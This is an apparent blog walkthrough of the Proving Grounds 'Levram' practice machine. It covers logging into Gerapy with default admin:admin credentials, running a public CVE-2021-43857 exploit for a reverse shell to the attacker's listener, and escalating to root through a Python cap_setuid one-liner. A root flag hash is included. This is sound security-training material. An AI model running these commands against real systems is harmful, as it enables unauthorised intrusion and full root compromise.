Introduction
Welcome to another OSCP-style walkthrough on Proving Grounds – Levram. This machine is a great practice target for web exploitation and Linux privilege escalation. In this post, I’ll guide you through the full attack path, including enumeration, exploitation, and privilege escalation.
Enumeration
Nmap Scan
Starting with an Nmap scan to identify open ports and services:
nmap -sC -sV -p- $IP --openResults show SSH (22) and an HTTP service (8000).
Web Application – Gerapy
Visiting port 8000, we find Gerapy, a Python-based web crawler manager. Checking for default credentials, we successfully log in with:
Username: admin
Password: adminExploitation – Remote Code Execution (RCE)
After researching, we find Gerapy is vulnerable to CVE-2021-43857, an authenticated RCE vulnerability.
Steps to Exploit:
Copied the exploit to a local file using searchsploit.
searchsploit -m python/remote/50640.pyRan the Exploit.
python3 50640.py --target $RHOST -p 8000 -L $LHOST -P 4444Initial Exploit Attempt Fails (no projects found).
Created a New Project using the Gerapy UI.
Re-Ran the Exploit:
Reverse shell obtained as app!
Privilege Escalation
Enumeration for Root Access
Standard checks for SUID binaries and misconfigurations revealed nothing useful. However, checking capabilities with getcap, we found:
getcap -r / 2>/dev/nullPython3 has cap_setuid=ep, meaning it can execute commands as root.
Exploiting Python Capabilities
Using GTFOBins, we escalate to root:
/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/bash")'🔥 Root shell obtained! 🔥
Conclusion
Key Takeaways
The Low-Hanging Fruit of Pentesting
One of the easiest wins in penetration testing is checking for default or weak credentials—and Levram was no exception. The Gerapy admin panel allowed login with admin:admin, giving instant access to a vulnerable web application. This highlights a critical security flaw: many applications ship with default logins that users forget to change. Always test common username/password combinations before diving into more complex attack vectors—you might just walk through the front door. 🚀🔑
The Power of getcap in Privilege Escalation
When looking for privilege escalation paths, capabilities (getcap) are often overlooked but can be just as powerful as SUID binaries. Linux capabilities allow binaries to execute specific privileged actions without requiring full root access. Misconfigured binaries, like Python with cap_setuid=ep, let attackers escalate privileges by spawning a root shell.
cap_setuid=ep → Can change user ID (e.g., Python, Perl, or Bash).
cap_setgid=ep → Can change group ID.
cap_net_bind_service=ep → Can bind low ports (often risky on shared hosts).
cap_dac_override=ep → Bypasses file permission checks.
cap_sys_admin=ep → Equivalent to root in many cases!
Final Flag:
cat /root/proof.txt📜 Root hash: f24fb68f9534867212669703025a8f40
This box was a great OSCP-style challenge, covering web exploitation and Linux privilege escalation. Hope you found this write-up helpful! 🚀
More OSCP Walkthroughs Coming Soon!
